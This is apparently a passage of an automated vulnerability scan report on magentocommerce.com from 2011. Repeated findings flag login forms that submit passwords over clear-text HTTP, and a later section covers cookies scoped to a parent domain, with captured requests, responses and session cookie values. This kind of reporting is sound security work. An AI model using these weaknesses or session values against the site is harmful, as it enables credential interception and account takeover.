Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170923; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.5.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171066; expires=Sat, 11-Aug-2012 13:44:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:26 GMT
Content-Length: 37516

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.138. http://www.magentocommerce.com/showcase  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /showcase

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /showcase HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176322; expires=Sat, 11-Aug-2012 15:12:02 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fshowcase%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:02 GMT
Content-Length: 50996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.139. http://www.magentocommerce.com/sitemap/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /sitemap/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /sitemap/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176452; expires=Sat, 11-Aug-2012 15:14:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fsitemap%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:12 GMT
Content-Length: 55319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.140. http://www.magentocommerce.com/support/magento-user-guide-book  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /support/magento-user-guide-book

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /support/magento-user-guide-book HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176223; expires=Sat, 11-Aug-2012 15:10:23 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fsupport%2Fmagento-user-guide-book%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:23 GMT
Content-Length: 39756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.141. http://www.magentocommerce.com/support/magento_core_api  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /support/magento_core_api

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /support/magento_core_api HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176236; expires=Sat, 11-Aug-2012 15:10:36 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fsupport%2Fmagento_core_api%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:36 GMT
Content-Length: 34959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.142. http://www.magentocommerce.com/support/overview  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /support/overview

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /support/overview HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176215; expires=Sat, 11-Aug-2012 15:10:15 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fsupport%2Foverview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:16 GMT
Content-Length: 37099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.143. http://www.magentocommerce.com/svn  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /svn

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /svn HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176280; expires=Sat, 11-Aug-2012 15:11:20 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A5%3A%22%2Fsvn%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:21 GMT
Content-Length: 33351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.144. http://www.magentocommerce.com/system-requirements  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /system-requirements

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /system-requirements HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176280; expires=Sat, 11-Aug-2012 15:11:20 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fsystem-requirements%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:20 GMT
Content-Length: 34053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.145. http://www.magentocommerce.com/translations  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /translations

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /translations HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176425; expires=Sat, 11-Aug-2012 15:13:45 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Ftranslations%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:45 GMT
Content-Length: 81713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.146. http://www.magentocommerce.com/ua  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /ua

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /ua HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176554; expires=Sat, 11-Aug-2012 15:15:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fua%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:54 GMT
Content-Length: 73040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.147. http://www.magentocommerce.com/vi  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /vi

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /vi HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176552; expires=Sat, 11-Aug-2012 15:15:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fvi%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:53 GMT
Content-Length: 88806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.148. http://www.magentocommerce.com/virtual/download-magento/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /virtual/download-magento/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /virtual/download-magento/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176609; expires=Sat, 11-Aug-2012 15:16:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fvirtual%2Fdownload-magento%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Content-Length: 32488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.149. http://www.magentocommerce.com/virtual/enterprise-register/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /virtual/enterprise-register/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /virtual/enterprise-register/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176624; expires=Sat, 11-Aug-2012 15:17:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A29%3A%22%2Fvirtual%2Fenterprise-register%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Content-Length: 32488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.150. http://www.magentocommerce.com/whitepaper/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /whitepaper/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /whitepaper/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176269; expires=Sat, 11-Aug-2012 15:11:09 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fwhitepaper%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:09 GMT
Content-Length: 34176

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

3. Cookie scoped to parent domain  previous  next
There are 169 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


3.1. http://www.magentocommerce.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.magentocommerce.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
